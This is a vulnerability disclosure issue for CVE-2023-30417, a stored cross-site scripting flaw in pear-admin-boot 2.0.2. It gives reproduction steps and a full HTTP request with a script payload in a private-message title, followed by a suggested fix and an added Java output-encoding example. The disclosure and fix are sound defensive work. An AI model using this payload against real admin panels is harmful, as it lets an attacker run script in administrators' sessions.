CVE-2023-30417: Stored cross-site scripting vulnerability in pear-admin-boot · Issue #I6SXHX · Pear Admin/Pear Admin Boot - Gitee.com
A cross-site scripting (XSS) vulnerability in Pear-Admin-Boot up to v2.0.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title of a private message.
Vulnerability type
Stored cross-site scripting
Affected entity and version
pear-admin-boot <= 2.0.2
Vulnerability verification
Precondition: a user with private-message permission is logged in
Steps:
1. Run a pear-admin-boot 2.0.2 environment
2. As administrator, create a user that has private-message permission
3. Log in as the user with private-message permission
4. Send a private message to the "管理" (admin) user with the payload in the title: 123<script>alert(1)</script>456
Full request:
POST /system/notice/save HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: keep-alive
Content-Length: 141
Content-Type: application/json
Cookie: rememberme-token=M1lPJTJCTFpzMDdWQjcxVXFtRXVUQWNRJTNEJTNEOkFWRUNDbDlqWFVTOFIlMkZCVjFrN2xCdyUzRCUzRA; JSESSIONID=E032828B9FC2AA972BBAABEE11EC4456
Host: 127.0.0.1:8080
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/system/notice/add
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
{"title":"123<script>alert(1)</script>456","content":"123456","sender":"1642713637653180417","accept":"1309861917694623744","type":"private"}
5. Log in with the administrator account; the XSS fires on login
Suggested fix
I submitted a Pull Request that HTML-entity-encodes title and content in the selectSysNoticeList method of SysNoticeServiceImpl.java before the response is output to the page; this should fix the vulnerability.
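The following is an added example, not code from the pear-admin-boot project or from the reporter's Pull Request. It shows the kind of output encoding the suggested fix describes: every notice's title and content are HTML-entity-encoded before the list is handed to the page, so the payload from step 4 is rendered as literal text instead of executing. The class, record and method names are hypothetical stand-ins for the project's SysNotice entity and service; the example assumes Java 17 or later and has no dependencies beyond the standard library.

```java
import java.util.List;

/**
 * Added example (hypothetical names; not the project's own code):
 * output-encodes notice fields before they are rendered in the admin UI.
 */
public class NoticeOutputEncodingExample {

    /** Minimal notice record standing in for the project's SysNotice entity. */
    public record Notice(String title, String content) {}

    /**
     * Encode the five characters that can break out of HTML text or
     * attribute context. Encoding is done once, on output, so that the
     * stored value is left untouched and cannot be double-encoded later.
     */
    public static String htmlEscape(String input) {
        if (input == null) {
            return null;
        }
        StringBuilder sb = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&' -> sb.append("&amp;");
                case '<' -> sb.append("&lt;");
                case '>' -> sb.append("&gt;");
                case '"' -> sb.append("&quot;");
                case '\'' -> sb.append("&#39;");
                default -> sb.append(c);
            }
        }
        return sb.toString();
    }

    /**
     * Encode title and content of every notice, mirroring where the fix
     * applies: in the list method, just before the result reaches the page.
     */
    public static List<Notice> encodeForOutput(List<Notice> notices) {
        return notices.stream()
                .map(n -> new Notice(htmlEscape(n.title()), htmlEscape(n.content())))
                .toList();
    }

    /** Regression check: no raw angle bracket may survive encoding. */
    public static boolean containsRawTag(String s) {
        return s != null && (s.contains("<") || s.contains(">"));
    }

    public static void main(String[] args) {
        // Constructed sample using the title payload shown in the report.
        Notice stored = new Notice("123<script>alert(1)</script>456", "123456");
        Notice safe = encodeForOutput(List.of(stored)).get(0);
        System.out.println(safe.title());
        if (containsRawTag(safe.title()) || containsRawTag(safe.content())) {
            throw new IllegalStateException("output encoding failed");
        }
    }
}
```

Encoding at output rather than at input is the safer choice for a stored field: it protects every page that renders the value, and it keeps the database content unchanged so a later change of rendering context does not require re-sanitizing stored rows. If the admin UI also renders notice fields through a client-side template, that template must not unescape the value again (for example by inserting it as raw HTML), otherwise the server-side encoding is undone.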